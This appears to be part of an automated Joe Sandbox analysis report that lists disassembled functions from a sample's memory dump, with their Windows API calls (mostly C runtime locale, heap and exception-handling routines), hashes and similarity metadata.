Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: c4c563a27941d288ce3d554d67a20e66d4b2ee927ce87e6791932d3d5477a932
Instruction ID: 90979c4808c2bdb0184ab3fe85b163023baced235c0f532fdf8583f83549d9a6
Opcode Fuzzy Hash: c4c563a27941d288ce3d554d67a20e66d4b2ee927ce87e6791932d3d5477a932
Instruction Fuzzy Hash: 1CF04975D00208EBCB05DBA4C9459AEBBB5AF44300F548199E8046B282EBB59F01EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F1845A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F1D6D2,?,00000000,?,00F22956,?,00000004,00000000,?,?,?,00F16BBE), ref: 00F1848C

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 311ac9082637a025407cf2e52b0e014088164d9d9e5f1f21929fc2dbab25620b
Instruction ID: 4ceadbc0e13151f3d7b0adb2deadc2c5c5a39b8fbf1e0de5dc48fa05a2c34374
Opcode Fuzzy Hash: 311ac9082637a025407cf2e52b0e014088164d9d9e5f1f21929fc2dbab25620b
Instruction Fuzzy Hash: 35E0E531940256ABF7317AAA9E007DA364C9F423F0F2A4020ED699A0C0CF24CCC2B2A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F21DB7 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

GetACP.KERNEL32(?,?,?,?,?,?,00F15AD5,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F21E78
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F15AD5,?,?,?,00000055,?,-00000050,?,?), ref: 00F21EA3
_wcschr.LIBVCRUNTIME ref: 00F21F37
_wcschr.LIBVCRUNTIME ref: 00F21F45
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F22006

Strings

utf8, xrefs: 00F21F75

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 669813914d5939b2fd83a755102bfe7febfa89209fef354fb1924fb733d42a33
Instruction ID: d0632ebc692ef08ecf898bfec865b5e1abfc842795312073367978f6c1fdbc15
Opcode Fuzzy Hash: 669813914d5939b2fd83a755102bfe7febfa89209fef354fb1924fb733d42a33
Instruction Fuzzy Hash: EC716631A00725AADB24AB34ED42BBB33A8FF64710F114029F915DB181FB78E941F768

Uniqueness

Uniqueness Score: -1.00%

Function 00F22543 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00F22861,00000002,00000000,?,?,?,00F22861,?,00000000), ref: 00F225DC
GetLocaleInfoW.KERNEL32(?,20001004,00F22861,00000002,00000000,?,?,?,00F22861,?,00000000), ref: 00F22605
GetACP.KERNEL32(?,?,00F22861,?,00000000), ref: 00F2261A

Strings

ACP, xrefs: 00F22561
OCP, xrefs: 00F22597

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 348876e90887e839161568f07b07abda91307ab17732823a4bad55354a9814db
Instruction ID: dbbb5105e76ebdeaf5c2f7ecba09cb5ecb79f41a8f19062d6e4d501463508e15
Opcode Fuzzy Hash: 348876e90887e839161568f07b07abda91307ab17732823a4bad55354a9814db
Instruction Fuzzy Hash: 7E21C433E00120B7DBB48F14E912B9B76A6EB54B74B5AC424E90ADB104E732DE41E790

Uniqueness

Uniqueness Score: -1.00%

Function 00F22718 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

Part of subcall function 00F18AC7: _free.LIBCMT ref: 00F18B29
Part of subcall function 00F18AC7: _free.LIBCMT ref: 00F18B5F

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F22824
IsValidCodePage.KERNEL32(00000000), ref: 00F2286D
IsValidLocale.KERNEL32(?,00000001), ref: 00F2287C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F228C4
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F228E3

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 03d34834f7869396a0279be0eb6c1b104f39215167b8f3b7b1daf2abff1147a6
Instruction ID: c1f1c86a0aadf39ff67ad8233da8a5d4c5514e3eab76c83ac2a0752cce12dc1d
Opcode Fuzzy Hash: 03d34834f7869396a0279be0eb6c1b104f39215167b8f3b7b1daf2abff1147a6
Instruction Fuzzy Hash: 83517172D00229BBDB60DFA5EC41AFE77B8AF04710F58402AE910EB190EB74D941EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F0C38D Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F0C399
IsDebuggerPresent.KERNEL32 ref: 00F0C465
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F0C485
UnhandledExceptionFilter.KERNEL32(?), ref: 00F0C48F

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ca3b06bc5b4d39317e118a3c5930a53bb365400e568c5eeaedc117805e29e639
Instruction ID: f1b60e86b9dce53fa70a3126882cc6c27c69f0d908ffb2676e68aa2b85eb960b
Opcode Fuzzy Hash: ca3b06bc5b4d39317e118a3c5930a53bb365400e568c5eeaedc117805e29e639
Instruction Fuzzy Hash: 71310875D0121C9BDF20DF64DD897DDBBB8BF08304F1041AAE40DA7280EB745A859F85

Uniqueness

Uniqueness Score: -1.00%

Function 00F221CA Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

Part of subcall function 00F18AC7: _free.LIBCMT ref: 00F18B29
Part of subcall function 00F18AC7: _free.LIBCMT ref: 00F18B5F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2221E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F22268
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2232E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: a812a7d8942d4d765be3f2303ad44f34372de7344aa1444925f1ad40832fedf3
Instruction ID: 160cd75d24dfd0c20f1e99916f7eca9424566c3595a5f55130f323bf4c2d0960
Opcode Fuzzy Hash: a812a7d8942d4d765be3f2303ad44f34372de7344aa1444925f1ad40832fedf3
Instruction Fuzzy Hash: DE619371900227AFEB68DF28ED82BBA77A8EF04310F104179ED45C6185E738DE81EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F11BA0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F11C98
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F11CA2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F11CAF

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b8f845114bb619c0dab1f190b2f9e19f7febb456b3091ae1ae700ae83f5f6b9f
Instruction ID: c96601de8052dda6809690e744b10792f7e7e0b533684ee4861e7d7c58e62134
Opcode Fuzzy Hash: b8f845114bb619c0dab1f190b2f9e19f7febb456b3091ae1ae700ae83f5f6b9f
Instruction Fuzzy Hash: 8F31B1749012289BCB21DF68DD897DDBBB8BF08310F5042EAE51CA6291E7749F819F85

Uniqueness

Uniqueness Score: -1.00%

Function 00F28BED Relevance: 4.3, Strings: 3, Instructions: 551COMMON

Download Yara Rule

Strings

~, xrefs: 00F293BF
u, xrefs: 00F28DCE
rx, xrefs: 00F28E8E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID: ~$rx$u
API String ID: 0-673773115
Opcode ID: 8b574ab546e66f1592baa7ab0d30d203fec1ac4d27d1207a9e03f27a3449f5b7
Instruction ID: 7082660f8049543eeea740fd8f83b0b6f7cbc4ed38d5ee3a82af1cdccbaddaf9
Opcode Fuzzy Hash: 8b574ab546e66f1592baa7ab0d30d203fec1ac4d27d1207a9e03f27a3449f5b7
Instruction Fuzzy Hash: AE4257F1D091398BDB24DB24D9902A9B7B2BF90318F1481DBD00A67645D7B4ABD1AF0E

Uniqueness

Uniqueness Score: -1.00%

Function 00F13B40 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee80ee5162a149c307ad938d1b9f6046d4a88669daa78f78fbd0fb484182a8e0
Instruction ID: 5cc3ebf24b9b760dc089d19750ed9efe4199b0ebaaa60e446dcfb5bd03ba3f2c
Opcode Fuzzy Hash: ee80ee5162a149c307ad938d1b9f6046d4a88669daa78f78fbd0fb484182a8e0
Instruction Fuzzy Hash: 37F12F71E002199FDF14CFA9D9806EDBBB1FF48324F158269E419A7384D731AE45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2344F Relevance: 2.9, APIs: 1, Instructions: 1383COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00F235C6

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 740aedf97146c2a22cd27e41ccc0306385f156731bf96ee4294a3e6d8ebc30fb
Instruction ID: e4017fa0c6e3bbafcaf69a388cf1816358565c41492f7cf81cf604fcfa523398
Opcode Fuzzy Hash: 740aedf97146c2a22cd27e41ccc0306385f156731bf96ee4294a3e6d8ebc30fb
Instruction Fuzzy Hash: 1FC23AB2E082388FDB65CE28ED407EAB7B5EB45315F1441EAD44DE7240E778AE819F41

Uniqueness

Uniqueness Score: -1.00%

Function 00F0C605 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F0C61B

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 2fa06898a4657b8cb1218c8af8edc449f53817325e80feeec4e416f021e13153
Instruction ID: 95765f6d23a6587f0b23b9e4fd2711e2ae1582c0321a5dcaf6a40c36af8e83a1
Opcode Fuzzy Hash: 2fa06898a4657b8cb1218c8af8edc449f53817325e80feeec4e416f021e13153
Instruction Fuzzy Hash: D251C472E002098FDB29CF59E4D13AABBF1FB44354F54813AC915EB284D3749980EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F1F23E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af134b0af46fb4050c5c6b1fe70ee12a133a09dcede5f515dbc7b01f25029a9
Instruction ID: 268d1ed4572ec5f1ae876489b377e578c55b414eb963932dd5e1e26c661cb8a0
Opcode Fuzzy Hash: 8af134b0af46fb4050c5c6b1fe70ee12a133a09dcede5f515dbc7b01f25029a9
Instruction Fuzzy Hash: ED41A2B5C0422CAFDB24DF69CC89AEABBB8AF45314F1442EDE41DD3211DA359E859F10

Uniqueness

Uniqueness Score: -1.00%

Function 00F2241D Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

Part of subcall function 00F18AC7: _free.LIBCMT ref: 00F18B29
Part of subcall function 00F18AC7: _free.LIBCMT ref: 00F18B5F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F22471

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 09670e8f589faf374ff443ca2c404f51d4aa93b24f5e6225fb49c98d5daec01a
Instruction ID: 7ac7d57b45156216538e9e5aa2a9d9f0d89f6a7a1582dd8b0ab0d904bc48f6b8
Opcode Fuzzy Hash: 09670e8f589faf374ff443ca2c404f51d4aa93b24f5e6225fb49c98d5daec01a
Instruction Fuzzy Hash: B221AA72A112267BDB68EA58ED41EBA77ACEF44314F10407AFD05D6142EB78DD80E750

Uniqueness

Uniqueness Score: -1.00%

Function 00F220A4 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

EnumSystemLocalesW.KERNEL32(00F221CA,00000001,00000000,?,-00000050,?,00F227F8,00000000,?,?,?,00000055,?), ref: 00F22116

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c638dfe61f742102a6898af3ee8d9a9acf8f0454d42f92b74f52f78b146f7cab
Instruction ID: 4607d127e9f26145c6b171ac9c2a4b53c6de2c3f194a7499b13325cc316873ea
Opcode Fuzzy Hash: c638dfe61f742102a6898af3ee8d9a9acf8f0454d42f92b74f52f78b146f7cab
Instruction Fuzzy Hash: 93110C376007056FDB189F39D8A1ABABBA1FF80368B14842DEA4747A40D775B953D740

Uniqueness

Uniqueness Score: -1.00%

Function 00F22649 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F223E6,00000000,00000000,?), ref: 00F22675

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 7d2cda362a47a7de4370c413fcbe95df113ba5b1076355308d63a9d967215663
Instruction ID: d40bf650eb0878d2edf053419e284eaa902ad57345573dd9e6e2fa245f561627
Opcode Fuzzy Hash: 7d2cda362a47a7de4370c413fcbe95df113ba5b1076355308d63a9d967215663
Instruction Fuzzy Hash: 3CF02833E00221BBDB689A24DD05BBE7F68EF40368F044429ED06B7180EA74FD41EA90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2213F Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

EnumSystemLocalesW.KERNEL32(00F2241D,00000001,?,?,-00000050,?,00F227BC,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F22189

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ef1332f34f6a7f342419953349cf89c9eff4335832666364b29616e4c72301cc
Instruction ID: 6053d8b3db5aa3b4d16a2b164da5598361e8521020d7f2dde1fac9c06984c2bf
Opcode Fuzzy Hash: ef1332f34f6a7f342419953349cf89c9eff4335832666364b29616e4c72301cc
Instruction Fuzzy Hash: 2FF0F6362003147FDB249F39EC81E7A7B95EF8036CB15842DFA064B681D6759C42E750

Uniqueness

Uniqueness Score: -1.00%

Function 00F179E6 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00F11DEE: EnterCriticalSection.KERNEL32(-011AA608,?,00F16AF4,?,011A7600,0000000C,00F16DD5,?), ref: 00F11DFD

EnumSystemLocalesW.KERNEL32(00F179D9,00000001,011A7660,0000000C,00F17E04,00000000), ref: 00F17A1E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: e4d305ca50b5fd3da57e56c9809b850a2cd0a32cd10ffdc106550894b1e993f8
Instruction ID: d84f3b06d7bbdf446345eddf9ece2d478931e3753c43ee6d70dacbd54b235120
Opcode Fuzzy Hash: e4d305ca50b5fd3da57e56c9809b850a2cd0a32cd10ffdc106550894b1e993f8
Instruction Fuzzy Hash: 49F08776A04204DFDB14EF98E902B9D7BB0FB44720F50412AE4259B290D7795980EF41

Uniqueness

Uniqueness Score: -1.00%

Function 00F22059 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

